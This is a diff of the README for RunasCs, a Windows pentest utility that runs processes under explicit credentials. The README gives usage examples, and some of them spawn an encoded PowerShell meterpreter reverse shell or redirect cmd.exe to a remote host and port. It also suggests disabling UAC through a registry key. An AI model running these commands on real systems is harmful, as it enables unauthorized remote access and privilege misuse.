antonioCoco
diff --git a/‎Invoke-RunasCs.ps1‎
Lines changed: 76 additions & 16 deletions b/‎Invoke-RunasCs.ps1‎
Lines changed: 76 additions & 16 deletions
diff --git a/‎README.md‎
Lines changed: 110 additions & 70 deletions b/‎README.md‎
Lines changed: 110 additions & 70 deletions
@@ -1,93 +1,133 @@
-# RunasCs
-<p>RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials.</p>
-<p>This tool is an improved (from a pentest perspective) and open version of windows builtin runas.exe that solves some limitations:</p>
-<ul>
-  <li>Allows explicit credentials;</li>
-  <li>Works both if spawned from interactive process and from service process;</li>
-  <li>Manage properly DACL for Window Stations and Desktop for the creation of the new process;</li>
-  <li>Uses more reliable and free create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection);</li>
-  <li>Allows to specify the logon type, i.e. network logon 3 (no UAC limitations);</li>
-  <li>It's Open Source :)</li>
-</ul>
-<br>
-<p>RunasCs has an automatic detection to determine the best create process function for every contexts.
+### RunasCs
+
+----
+
+*RunasCs* is an utility to run specific processes with different permissions than the user's current logon provides using explicit credentials.
+This tool is an improved (from a pentest perspective) and open version of windows builtin *runas.exe* that solves some limitations:
+
+* Allows explicit credentials
+* Works both if spawned from interactive process and from service process
+* Manage properly *DACL* for *Window Stations* and *Desktop* for the creation of the new process
+* Uses more reliable create process functions like ``CreateProcessAsUser()`` and ``CreateProcessWithTokenW()`` if the calling process holds the required privileges (automatic detection)
+* Allows to specify the logon type, i.e. network logon 3 (no *UAC* limitations)
+* Allows redirecting *stdin*, *stdout* and *stderr* to a remote host
+* It's Open Source :)
+
+*RunasCs* has an automatic detection to determine the best create process function for every contexts.
 Based on the process caller token permissions, it will use one of the create process function in the following preferred order:
-    <ol>
-      <li> CreateProcessAsUser();</li>
-      <li> CreateProcessWithTokenW();</li>
-      <li> CreateProcessWithLogonW().</li>
-    </ol>
-</p>
 
-## Requirements
-<p>.NET Framework >= 2.0</p>
+1. ``CreateProcessAsUser()``
+2. ``CreateProcessWithTokenW()``
+3. ``CreateProcessWithLogonW()``
 
-## Usage
-```
-RunasCs is an utility to run specific processes with different permissions than the user's current logon provides
-using explicit credentials.
-RunasCs has an automatic detection to determine the best create process function for every contexts.
-Based on the caller token permissions, it will use one of the create process function in the following preferred order:
-    1. CreateProcessAsUser();
-    2. CreateProcessWithTokenW();
-    3. CreateProcessWithLogonW().
-The two processes (calling and called) will communicate through 1 pipe (both for stdout and stderr).
-The default logon type is 3 (Network_Logon).
-If you set Interactive (2) logon type you will face some UAC restriction problems.
-You can make interactive logon without any restrictions by setting the following regkey to 0 and restart the server:
 
-    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
+### Requirements
+
+----
 
-By default, the calling process (RunasCs) will wait until the end of the execution of the spawned process and will use
-cmd.exe to manage stdout and stderr.
-If you need to spawn a background or async process, i.e. spawning a reverse shell, you need to set the parameter
-'process_timeout' to 0. In this case the process will be spawned without using cmd.exe and RunasCs won't
-wait for the end of the execution.
+.NET Framework >= 2.0
+
+
+### Usage
+
+----
+
+```console
+C:\ProgramData>.\RunasCs_net2.exe --help
+
+RunasCs v1.3 - @splinter_code
 
 Usage:
-    RunasCs.exe username password cmd [domain] [process_timeout] [logon_type]
+    RunasCs.exe username password cmd [-d domain] [-f create_process_function] [-l logon_type] [-r host:port] [-t process_timeout] [--create-profile]
+
+Description:
+    RunasCs is an utility to run specific processes under a different user account
+    by specifying explicit credentials. In contrast to the default runas.exe command
+    it supports different logon types and crateProcess functions to be used, depending
+    on your current permissions. Furthermore it allows input/output redirection (even
+    to remote hosts) and you can specify the password directly on the command line.
 
 Positional arguments:
     username                username of the user
     password                password of the user
     cmd                     command supported by cmd.exe if process_timeout>0
                             commandline for the process if process_timeout=0
-    domain                  domain of the user, if in a domain.
+Optional arguments:
+    -d, --domain domain
+                            domain of the user, if in a domain.
                             Default: ""
-    process_timeout         the waiting time (in ms) to use in
-                            the WaitForSingleObject() function.
-                            This will halt the process until the spawned
-                            process ends and sent the output back to the caller.
-                            If you set 0 an async process will be
-                            created and no output will be retrieved.
-                            If this parameter is set to 0 it won't be
-                            used cmd.exe to spawn the process.
-                            Default: "120000"
-    logon_type              the logon type for the spawned process.
+    -f, --function create_process_function
+                            CreateProcess function to use. When not specified
+                            RunasCs determines an appropriate CreateProcess
+                            function automatically according to your privileges.
+                            0 - CreateProcessAsUserA
+                            1 - CreateProcessWithTokenW
+                            2 - CreateProcessWithLogonW
+    -l, --logon-type logon_type
+                            the logon type for the spawned process.
                             Default: "3"
+    -r, --remote host:port
+                            redirect stdin, stdout and stderr to a remote host.
+                            Using this option sets the process timeout to 0.
+    -t, --timeout process_timeout
+                            the waiting time (in ms) for the created process.
+                            This will halt RunasCs until the spawned process
+                            ends and sent the output back to the caller.
+                            If you set 0 no output will be retrieved and cmd.exe
+                            won't be used to spawn the process.
+                            Default: "120000"
+    -p, --create-profile
+                            if this flag is specified RunasCs will force the
+                            creation of the user profile on the machine.
+                            This will ensure the process will have the
+                            environment variables correctly set.
+                            NOTE: this will leave some forensics traces
+                            behind creating the user profile directory.
+                            Compatible only with -f flags:
+                                1 - CreateProcessWithTokenW
+                                2 - CreateProcessWithLogonW
 
 Examples:
     Run a command as a specific local user
         RunasCs.exe user1 password1 whoami
-    Run a command as a specific domain user
-        RunasCs.exe user1 password1 whoami domain
-    Run a command as a specific local user with interactive logon type (2)
-        RunasCs.exe user1 password1 whoami "" 120000 2
+    Run a command as a specific domain user and interactive logon type (2)
+        RunasCs.exe user1 password1 whoami -d domain -l 2
     Run a background/async process as a specific local user,
-    i.e. meterpreter ps1 reverse shell
-        RunasCs.exe "user1" "password1" "%COMSPEC% powershell -enc..." "" "0"
-    Run a background/async interactive process as a specific local user,
-    i.e. meterpreter ps1 reverse shell
-        RunasCs.exe "user1" "password1" "%COMSPEC% powershell -enc.." "" "0" "2"
+        RunasCs.exe user1 password1 "%COMSPEC% powershell -enc..." -t 0
+    Redirect stdin, stdout and stderr of the specified command to a remote host
+        RunasCs.exe user1 password1 cmd.exe -r 10.10.10.24:4444
+    Run a command simulating the /netonly flag of runas.exe
+        RunasCs.exe user1 password1 whoami -d domain -l 9
+```
+
+The two processes (calling and called) will communicate through one *pipe* (both for *stdout* and *stderr*).
+The default logon type is 3 (*Network_Logon*). If you set *Interactive* (2) logon type you will face some *UAC* restriction problems.
+You can make interactive logon without any restrictions by setting the following regkey to 0 and restart the server:
+
+```
+HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
 ```
 
-## References
-- https://decoder.cloud/2018/01/13/potato-and-tokens/
-- https://github.com/dahall/Vanara
-- https://docs.microsoft.com/en-us/previous-versions/aa379608(v=vs.85)
-- https://support.microsoft.com/en-us/help/190351/how-to-spawn-console-processes-with-redirected-standard-handles
-- https://support.microsoft.com/en-us/help/327618/security-services-and-the-interactive-desktop-in-windows
-- https://blogs.msdn.microsoft.com/winsdk/2015/06/03/what-is-up-with-the-application-failed-to-initialize-properly-0xc0000142-error/
+By default, the calling process (*RunasCs*) will wait until the end of the execution of the spawned process and will use
+``cmd.exe`` to manage *stdout* and *stderr*. If you need to spawn a background or async process, i.e. spawning a reverse shell,
+you need to set the parameter ``-t timeout`` to ``0``. In this case the process will be spawned without using ``cmd.exe``
+and *RunasCs* won't wait for the end of the execution.
+
+### References
+
+----
+
+* https://decoder.cloud/2018/01/13/potato-and-tokens/
+* https://github.com/dahall/Vanara
+* https://docs.microsoft.com/en-us/previous-versions/aa379608(v=vs.85)
+* https://support.microsoft.com/en-us/help/190351/how-to-spawn-console-processes-with-redirected-standard-handles
+* https://support.microsoft.com/en-us/help/327618/security-services-and-the-interactive-desktop-in-windows
+* https://blogs.msdn.microsoft.com/winsdk/2015/06/03/what-is-up-with-the-application-failed-to-initialize-properly-0xc0000142-error/
+
+
+### Credits
+
+-----
 
-## Credits
-<a href="https://github.com/decoder-it">@decoder</a>
+* [@decoder](https://github.com/decoder-it)
+* [@qtc-de](https://github.com/qtc-de)